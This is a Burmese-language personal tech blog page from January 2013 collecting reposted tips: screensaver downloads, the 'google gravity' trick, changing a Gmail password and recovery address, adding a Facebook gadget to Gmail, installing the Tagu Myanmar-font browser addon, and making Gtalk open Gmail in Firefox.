အရေးကြီးတာက ကိုယ်ကျွမ်းကျင်ပါတယ်ဆိုတဲ့တခုကို သဘောတရားနားလည်ပြီး လိုအပ်သလို ကိုးကားအသုံးချနိုင်စွမ်း

ရှိဖို့က အဓိကအချက်ဖြစ်တယ်။အားလုံးတတ်မှ အလုပ်လုပ်မယ်ဆိုရင်တော့ ဒီတသက်လုပ်ဖြစ်တော့မှာမဟုတ်ပါဘူး။

ဘာဖြစ်လို့လဲဆိုတော့ တချို့နည်းပညာတွေကသင်ယူလို့မရပါဘူး။လက်တွေ့အတွေ့အကြုံကနေသာရရှိနိုင်လို့ဖြစ်ပါတယ်။

ကိုယ်လုပ်နိုင်တာလေး သေးသေးလေးပဲဖြစ်နေပါစေ၊အဲဒါလေးကိုပဲ ကောင်းကောင်းနားလည်နေပြီဆိုရင် အသင့်ဖြစ်နေပါပြီ။

အဲဒါလေးကိုမှနားလည်သလား မဝေခွဲနိုင်သေးရင်တော့ ကိုယ့်ရဲ့လေ့လာမှုကို ပြန်လည်စမ်းစစ်ဖို့လိုအပ်နေပြီဆိုတဲ့သဘောပါပဲ။

အစွန်းနှစ်ဖက်လွတ်ဖို့လိုအပ်ပါတယ်။နည်းပညာတခုထဲကိုပဲ မျက်စိစုံမှိတ်လုပ်မနေသင့်သလို၊ဟိုစပ်စပ် ဒီစပ်စပ်နဲ့ ဟိုမရောက်

ဒီမရောက်လဲ ဖြစ်မနေသင့်ပါဘူး။

လေ့လာဆဲ programmer များအတွက် တစ်စုံတရာ အထောက်အကူရမယ်လို့  ယူဆပါတယ်။      

                                                                      ဒီဘလော့ရေးသားတဲ့ဆရာကိုတောင်းပန်ပါတယ်ခဗျာင်္။ကျွန်တော်အေးဆေးမှဖတ်မယ်ဆိုပြီး
ကူးပြီးသိမ်းထားတာပါ ဘယ်ကနေကူးပြီးယူလာမိမှန်းလည်းမသိတော့လို့ ဒီပိုစ့်လေးရဲ့ 
ပိုင်ရှင်ဆရာကို အနူးအညွတ်တောင်းပန်ပါတယ်ခဗျာင်္။           ။

                                                                          ကျော်ဇင်ဟိန်း(ပူးပူး)


free website လုပ်လို့ ရတဲ့ဆိုဒ်များ

ကမ္ဘာကြီးကို အာကာသထဲကနေ ကြည့်သလို မြင်ရမဲ့ Screen saver

ကဲ့အပိုတွေပြောမနေတော့ဘူး ဒါလေးလည်း ဒေါင်းလိုက်ပါ လုံးဝလုံးဝ ကြိုက်သွားစေရမယ်
ကွန်ပျူတာသုံးနေရင်း desktop ကိုလှမ်းအကြည့်မှာငါ အာကာသထဲရောက်နေပါသလားဆိုပြီး
လန့် မသွားနဲ့ ဦးနော် အောက်ကလင့်လေးကိုနှိပ်ပါ

www.3planesoft.com/files/earth.exe

ကျေးဇူးတင်ပါတယ်။

ရေအောက်ကမ္ဘာထဲရောက်သွားသလိုခံစားစေရမယ် Screen Saver အလန်းလေး

တစ်ကယ့်ရေအောက်ကမ္ဘာထဲရောက်သွားစေရမယ်လို့ အာမခံပါတယ် အောက်ကလင့်လင့်လေးကို
နှိပ်ပြီး  ဒေါင်းလုဒ် လုပ်နိုင်ပါတယ်။


www.3planesoft.com/files/coralclock.exe

ဒေါင်းလုဒ်စွဲပြီးခံစားကြည့်လိုက်ပါ ကြိုက်သွားမှာသေချာပါတယ်ဗျာ။

ဂူဂဲလ်ကြီးကို တစ်စစီလုပ်မဲ့ နည်း(သို့ မဟုတ်) google gravity

 သူငယ်ချင်းများအားလုံးမင်္ဂလာပါ ခင်ဗျာ.....

ကျွန်တော်လည်းမွှေရင်းမွှေရင်းနဲ့ အခုလိုပဲ မွှေနည်းလေးတစ်ခုကိုတွေ့ ထားပါတယ်ဗျာ ။ ဘာနည်းလည်းဆိုတော့ ဂူဂဲလ် ကြီးကို တစ်စစီလုပ်တဲ့နည်း လေးပါ။ ဗီဒီယိုလေးနဲ့ လည်းပြထားပါတယ်။





 အဲ့လိုမျိုး တစ်စစီမွှေချင်ရင် google serch box ထဲမှာ google gravity လို့ ရိုက်လိုက်ပါ ။ google serch box ထဲမှာ google gravity လို့ ရိုက်ပြီး I'm feeling lucky ဆိုတဲ့serch box ရဲ့ညာဘက်အောက်ကဟာလေးကိုနှိပ်လိုက်ပါဗျာ။ပြီးရင် ခဏစောင့်လိုက်ပါ။ဂူဂဲလ်ကြီးတစ်စစီပြိုကျသွားတာကိုတွေ့ ရပါလိမ့်မည်။
မရှင်းလျှင် အပေါ်က ဗွီဒီယို မှာ ကြည့်နိုင်သလို အောက်ကပုံမှာလည်း ကြည့်နိုင်ပါတယ်။

 တစ်စစီထွက်ကျလာရင် လည်း ရအောင်သာစာရိုက်ပြီး အပြန့် အကြဲ အပုံလေးတွေ ကြားထဲထက်ပြီးမွှေကြည့်လိုက်ပါဦး။ မစမ်းပြတော့ဖူးနော်။

ပျော်ရွှင်ကြပါစေ......

Tuesday 29 January 2013

Malwarebytes Anti-Malware PRO Version: 1.70

Malwarebyte ဆော့ဝဲလ်ပါ။Update လေးထွက်လာလို့  တင်ပေးလိုက်တာပါ။

ဒီဆော့ဝဲလ်လေးကို အသုံးပြုနိုင်တဲ့ ဝင်းဒိုးတွေကတော့ Microsoft Windows XP, Vista, 7, 8 (32-bit and 64-bit) ဖြစ်ပါတယ်။အထွေးအထူးတော့ မရှင်းပြတော့ပါဖူး။အားလုံးရင်းနှီးပြီးသားပါ ဒီဆော့ဝဲလ်လေးက.....



လိုအပ်ခဲ့လျှင် Dropbox ဆိုဒ်မှ ဒေါင်းရန် 

ညမှ တစ်ခြားဆိုဒ်တွေ မှာ Upload ထပ်တင်ပေးပါ့မယ်။

အဆင်ပြေကြပါစေ။

Gmail,Gtalk Password ပြောင်းနည်း, ကာကွယ်နည်း & Browser Cleaner Portable 1.2 Build 0.102





ကိုမိုး: ကျွန်တော့် ကွန်ပျုတာမှာ Facebook နဲ့ Gmail တင်ပြီးမကြာဘူး သူများ ပက်(စ်)ဝက်ချိန်းသွားတာကိုခံနေရပါတယ်အစ်ကို ဖြစ်နိုင်ရင်ဘယ်လိုလုပ်ရမလဲ ဆိုတာကူညီပေးပါ..။
ဒါလေးကို New User တွေ သိထားသင့်တယ်ထင်လို့ မျှဝေပေးလိုက်ပါတယ်...
အပေါ်မှာ ကိုမိုး ပြောတဲ့ အတိုင်းဆိုရင် သူ့ Gmail အကောင့်ဟာ သူများကို ဖွင့်ခိုင်းတဲ့ Gmail ဖြစ်နိုင်ပါတယ်... အရေးကြီးတဲ့ Recover Mail ကလည်း အကောင့်ဖွင့်ပေးတဲ့ လူဆီမှာပဲ ရှိမှာပါ.. Recover Mail ကိုသိရင် Password ကို အချိန်မရွေး စိတ်ကြိုက်ပြောင်းပစ်နိုင်ပါတယ်...
နောက်တစ်ခုက အင်တာနက်ဆိုင်မှာ သွားသုံးရင် Keylogger လိုသုံးထားတာမျိုး (သို့) အင်တာနက် Browser တွေကနေတဆင့် Password တွေကို Auto Save ခိုင်းထားတာမျိုး တွေကနေ တဆင့် မိမိ အကောင့်ရဲ့ Password ကို သိသွားရင်လည်း Gmail Password ကို အချိန်မရွေး လွယ်ကူစွာပြောင်းပစ်နိုင်ပါသေးတယ်...
ကာကွယ်တဲ့ အနေနဲ့ Recover Mail နဲ့ Password ကို အောက်ပါနည်းလမ်းအတိုင်း ပြန်ပြောင်းထားလိုက်ပါ...

ပထမဆုံး ဒီနေရာကနေ မိမိတို့ Gmail နဲ့ Password ကို ထည့်ပြီး Sing in လိုက်ပါ...
Gmail ပွင့်လာရင် ပုံမှာပြထားတဲ့အတိုင်း Setting ကို နှိပ်ပါ..။
Accounts and Import ကို နှိပ်ပါ...



နံပါတ် (1) က အဝါရောင်နဲ့ ပြထားတဲ့ နေရာတွေကို တစ်ခုချင်း နှိပ်ပြီး Password , Recovery Mail တွေကို ပြောင်းပေးလိုက်ပါ...

နံပါတ် (2) ကတော့ မိမိ နာမည်ကို မြန်မာလို ပြင်ရေးနိုင်ပါတယ်..။



Current Password >> လက်ရှိ Login ဝင်ထားတဲ့ Password ကို အပေါ်ကအကွက်မှာ ရေးထည့်ပါ..

New Password >> မှာ မိမိပြောင်းလဲမဲ့ Password အသစ်ကို ရေးထည့်ပါ... အဲ့ဒီ Password ကိုပဲ အောက်က Confirm Password မှာ နောက်တစ်ခေါက် ပြန်ရေးထည့်ပေးလိုက်ပါ..။
အားလုံးပြီးသွားရင် Change Password ကို နှိပ်ပေးလိုက်ပါ..။
Recover Mail ကိုလည်း ပုံမှာ ပြထားသလို Edit ကို နှိပ်ပြီး တခြား Email လိပ်စာတစ်ခုခု ရေးထည့်ပေးလိုက်ပါ...။ ဒီ Recovery Mail ကအရေးကြီးပါတယ်... အကြောင်း တစုံတရာကြောင့်(Password မေ့သွားတာမျိုး) ဖြစ်စေ Hack ခံရလို့ဖြစ်စေ.... ဒီ Recovery Mail နဲ့ မိမိ Gmail Account ကို ပြန်လည်ရယူနိုင်ပါလိမ့်မယ်....
နောက်တစ်ခုက ကိုယ်ပိုင် ကွန်ပျူတာမသုံးနိုင်လို့ အင်တာနက်ဆိုင်မှာ သွားသုံးနေတဲ့ သူငယ်ချင်းတွေအတွက်ပါ...
တချို့အင်တာနက် Browser တွေက Password တွေကို Auto မှတ်သားထားတတ်ကြပါတယ်... Password တွေဟာ အဲ့ဒီ Browser ထဲမှာ ကျန်ခဲ့နိုင်ပါတယ်... အဲ့ဒီ အတွက်တော့ အောက်မှာတင်ပေးလိုက်တဲ့  Software လေးကို Stick ထဲထည့်ထားပြီး ဆောင်ထားလိုက်ပါ.... Software လေးကို ကွန်ပျူတာမှာတပ်ပြီး Run လိုက်ပါ.. ပုံမှာလို အားလုံးကို အမှန်ခြစ်လေးတွေတပ်ပေးပြီး Clean Now ကိုနှိပ်ပေးပြီး မိမိ အင်တာနက်ထဲမှာ မွှေခဲ့သမျှ History တွေကို အပြတ်ရှင်းပေးလိုက်ပါ....။

ဒါဆိုရင် မိမိ တို့ရဲ့ Password ကိုတွေ ဆိုင်မှာ မကျန်ခဲ့နိုင်တော့ပါဘူး...။

အားလုံးအဆင်ပြေကြပါစေ...

Browser Cleaner Portable 1.2 Build 0.102
Click Here to Download
 
ref-ဆရာဝင်း 

Facebook ကို G-Mail ထဲက ၀င်သုံးကြမယ်

အတော်များများတော့ သိကြပြီးသားဖြစ်ပါလိမ့်မယ်။

အရမ်းအဆင်ပြေတယ်ဆိုတာလည်းသိကြမှာပါ။


မသိသေးတဲ့သူငယ်ချင်းများ အဆင်ပြေစေဖို့ ရည်ညွှန်းပါတယ်နော်။





ကျနော်တို့ရဲ့ Face book စာမျက်နှာကို G-mail ထဲမှာ ပေါင်းထည့်ထားပြီး သုံးဖို့လေးပါ။

အဲဒီလိုပေါင်းထည့်လိုက်ပြီဆိုတာနဲ့ ကျနော်တို့တွေ Face book ရှိရာကို မသွားရတော့ပဲ

ကိုယ့်ရဲ့ G-mail ထဲကနေ ကိုယ့် Face book ထဲကို အိမ်မကွာ၊ကြမ်းမကွာ

ရောက်သွားတော့မှာလေ။



ဒီလိုလေး စလုပ်ကြည့်မယ်ဗျာ ...

(၁)မိမိရဲ့ G-mail ကိုဖွင့်ပြီး Setting ကိုနှိပ်ပါ။ ပွင့်လာပြီဆိုရင် Lab ကိုနှိပ်ပါ။(ခုတော့ mail setting ပေါ့)




....



(၂) Lab ပွင့်လာပြီးတဲ့နောက်မှာ Add any gadget by URL ဆိုတာလေးကို

Enable ပေးထားပါ။




(၃) နောက်တစ်ဆင့် ...Gadget ကိုနှိပ်ပါ။



(၄) Add ဆိုတဲ့ Box လေးကျလာပြီဆိုရင် အောက်မှာပေးထားတဲ့ Link ကိုကူးထည့်ပြီး

Add နှိပ်ပါ။ပြီးရင် save လိုက်ပါ။



http://hosting.gmodules.com/ig/gadgets/file/104971404861070329537/facebook.xml




အဲဒါတွေပြီးသွားရင်တော့ ကျနော်တို့ရဲ့ G-mail ကို Reload ပြန်ပေးလိုက်ပါ (သို့)


Keyboard ပေါ်က F5 ကီးကိုနှိပ်ပေးလိုက်ပါ။ အဲဒီအခါမှာ ကျနော်တို့ရဲ့

G-mail Inbox ထဲက


ဘယ်ဘက်အောက်နားလေးမှာ face book Logo လေးတွေ့နေရပါပြီ။



အဲဒီလိုဂိုလေးကိုနှိပ်လိုက်ရင်


Box လေးတစ်ခုကျလာပါလိမ့်မယ်။ Allow ကိုနှိပ်ပေးလိုက်ပါ။





 ဒါဆိုရင်တော့ Face book ထဲကို


Log-in ၀င်လို့ရပါပြီ ။



ကဲ...အခု ကျနော်တို့ရဲ့ G-mail Inbox ထဲကနေ Face book ကိုသုံးလို့ရသွားပါပြီ။




______________________________________________________________________


ဘာရယ်တော့မဟုတ်ဘူး.......... အားလုံးအဆင်ပြေကြပါစေနော်......

မူရင်း....ခန့်ချောလေးးး

Monday 28 January 2013

Firefox နှင့် Google Chrome သုံးသူများအတွက် မြန်မာစာအဆင်ပြေစွာ ဖတ်ရှုနိုင်သည့် Tagu တန်ခူး Addon



                           ကွန်ပျူတာ စနစ်တစ်ခုလုံးအတွက် မြန်မာ ဇော်ဂျီ font နှင့် အခြား ယူနီကုဒ် တစ်မျိုးမျိုး ထည့်သွင်းထားသော်လည်း Browser များ၏ ရံဖန်ရံခါ update ပြုလုပ်မှုများကြောင့်နှင့် အသုံးပြုသူများ၏ မှားယွင်းမှုများကြောင့် မြန်မာစာ အသုံးပြုထားသော webpage များကို ဖတ်ရှုရာမှာ လေးထောင့်တုံးများ ပေါ်နေတတ်ပြီး၊ အဆင်မပြေမှုများ ကြုံတွေ့ကြရပါတယ်။ Firefox နှင့် Google Chrome အသုံးပြုသူများအတွက်တော့ မြန်မာ developer တစ်ယောက်ဖန်တီးထားသော Tagu တန်ခူးဟုခေါ်သည့် Browser Addon တစ်ခုကို ထည့်သွင်းအသုံးပြုခြင်းဖြင့် အထက်ပါ Browser များမှာ Facebook အပါအဝင်၊ မြန်မာစာပါဝင်သော Webpage များမှာ အဆင်ပြေစွာ ဖတ်ရှုနိုင်မှာဖြစ်ပါတယ်။ ၄င်း Tagu Addon ကိုထည့်သွင်းထားခြင်းဖြင့် မိမိ၏ကွန်ပျူတာတွင် အခြားမည်သည့် မြန်မာစာစနစ်များကိုမှ ထည့်သွင်းထားစရာမလိုပဲ ဇော်ဂျီစနစ်ရော အခြား ယူနီကုဒ်စနစ်များကိုပါ အလိုအလျှောက် ခွဲခြားပြီး၊ ဖတ်ရှုနိုင်မှာ ဖြစ်ပါတယ်။



Firefox Browser တွင် Tagu Addon ထည့်သွင်းပုံ


၁။ Firefox browser ကို ဖွင့်ပါ။
၂။ Firefox Browser ၏ Address Bar တွင် အောက်တွင်ပေးထားသော URL လိပ်စာကို Copy ကူးပြီးလျှင် Paste လုပ်ခါ Enter ကိုနှိပ်ပါ။

https://addons.mozilla.org/en-US/firefox/addon/tagu/ 

၃။ အထက်ပါပုံတွင်ပြထားသည့်အတိုင်း "Add to Firefox" ကိုနှိပ်လိုက်လျှင် Update ပြုလုပ်ထားသည့် အချိန်မကြာသေးသည့်အတွက် Tagu Addon ကို Firefox မှ စမ်းသပ်မှုမပြုလုပ်ရသေးသောကြောင့် သတိနှင့် အသုံးပြုရန် Caution box ကျလာပါမယ်။ အောက်ပါ ပုံအတိုင်း "Add to Firefox" ကိုထပ်နှိပ်ပါ။
မှတ်ချက်- Tagu Addon ကို Firefox မှ စမ်းသပ်မှုပြုလုပ်ပြီးသွားပါက Caution box ထပ်မံကျလာတော့မည့်မဟုတ်ပဲ တိုက်ရိုက် install ပြုလုပ်သွားမှာပါ။


Google Chrome တွင် Tagu Addon ထည့်သွင်းပုံ


၁။ Google Chrome ကိုဖွင့်ပါ။
၂။ Google Chrome browser ၏ Address bar တွင် အောက်တွင်ပေးထားသော URL လိပ်စာကို Copy ကူးပြီး Paste လုပ်ခါ Enter ကိုနှိပ်ပါ။

https://chrome.google.com/webstore/detail/ddjpcdpfemhkibhpmgcdbfajdhgpegdk

၃။ အထက်ပါပုံတွင်ပြထားသည့်အတိုင်း "ADD TO CHROME" ကိုနှိပ်ပြီးလျှင် "Confirm New Extension" ဝင်းဒိုးကျလာပြီးလျှင် အောက်ပါပုံအတိုင်း "Add" ကိုထပ်နှိပ်ပါ။

                       အထက်ပါအဆင့်များပြီးဆုံးပါက လက်ရှိအသုံးပြုနေသော Browser များတွင် မြန်မာစာ အဆင်ပြေစွာ ကြည့်ရှုနိုင်ရန် အဆင်သင့်ဖြစ်ပါပြီ။ ယခု Addon ကို Mobile ဖုန်း Browser များတွင်ပါ အသုံးပြုနိုင်ပြီး၊ Firefox for Android 11 နှင့် အထက်မှာ အသုံးပြုနိုင်မှာ ဖြစ်တယ်လို့ Tagu Addon ရဲ့ Firefox စာမျက်နှာ မှာ ဖေါ်ပြထားပါတယ်။ 
source-stamedia.blogspot.com

ချစ်မြဲအတိုင်းချစ်မယ်-ခင်စုစုနိုင် (CD)

သတိထား – ကလနွန်းဘောင်ဝ် [ CD ]

Saturday 26 January 2013

ဂျီတော့ကနေ အီးမေးလ် အိုင်ကွန်လေးကို နှိပ်ပြီး ဂျီမေးလ် ကို ဖွင့်ရင် မော်ဇီလာ နှင့် ပွင့်အောင် လုပ်နည်း (မသိသေးသူများ အတွက်သာ)

ဂျီတော့ကနေ အီးမေးလ် အိုင်ကွန်လေးကို နှိပ်ပြီး ဂျီမေးလ်ဖွင့်ရင် Mozillafirefox  နဲ့ ပေါ်အောင်ဘယ်လိုလုပ်မလဲ မေးလာလို့  မသိသေးတဲ့ တစ်ခြားသူငယ်ချင်းတွေလည်း သိရအောင် ဘလော့ပို့ စ်အနေနဲ့ ပဲ တင်လိုက်ပါတယ်။

ပထမဦးဆုံး ဂျီတော့ ဆော့ဝဲလ်လေးကိုဖွင့်လိုက်ပါ။ဆော့ဝဲလ်ပေါ်လာရင် ညာဖက် အပေါ်မှာရှိတဲ့ Setting ကိုကလစ်ပြီး ဖွင့်လိုက်ပါ။

ပြီးရင် ပေါ်လာတဲ့ Settings တွေ အထဲက General မှာရှိတဲ့ Open Gmail when I click on email link ရှေ့က Box မှာ အမှန်ခြစ်လေးခြစ်ပေးပြီး အောက်ခြေမှာရှိတဲ့ OK ကိုနှိပ်ပြီးဆက်သွားလိုက်ပါ။


ပြီးရင် Mozilla Firefox Browser ကိုဖွင့်လိုက်ပါ။ ပေါ်လာရင် Mozilla Firefox ရဲ့ Setting တွေထဲက Tools ကိုကလစ် ပြီးရင် Options ကိုကလစ်ပြီး ဆက်သွားလိုက်ပါ။

Options ကို  ကလစ်ပြီးဆက်သွားလိုက်ရင် Options ဟူသော Box တစ်ခု ကျလာပါလိမ့်မည်။General ဟူသော Setting ကို စတွေ့ ရပါလိမ့်မည်။ Advanced ဆိုသော setting ကိုကလစ်လိုက်ပါ။

Advanced ကို ကလစ်လိုက်ရင် ပေါ်လာတဲ့ စာသားတွေထဲက Always Check to see......your default browser ရှေ့ရှိ လေးထောင့်ကွက်ထဲတွင် အမှန်ခြစ်လေးခြစ်ပေးပြီး အောက်ခြေရှိ OK ကို နှိပ်လိုက်ပါ။ မရှင်းလျှင် ပုံမှာ ကြည့်ပေးပါ။


အောက်ကပုံကတော့ တစ်ချို့  မော်ဇီလာ ဗားရှင်းတွေ မှာပေါ်တဲ့ပုံစံပါ။ Advanced ကိုကလစ်ပြီး ပေါ်လာတဲ့ Setting တွေထဲက Always Check to see......on startup ရှေ့က လေးထောင့်ကွက်ထဲတွင် အမှန်ခြစ်လေးခြစ် ပြီး အောက်ခြေရှိ OK ကို နှိပ်ပြီး မော်ဇီလာ ဘရိုဇာ ကို ပိတ်လိုက်ပါ။

ပြီးရင် Mozilla firefox browser ကို ပိတ်လိုက်ပါ။

ဒါဆိုရင် ဂျီတော့က မေးလ်ကို ဖွင့်ရင် မော်ဇီလာ ဘရိုဇာ နဲ့ ပဲ ပွင့်ပါပြီ။

အဆင်ပြေကြပါစေ။
Related Posts Plugin for WordPress, Blogger...

Like ခြင်းဖြင့် အားပေးပါ :)

mumcradio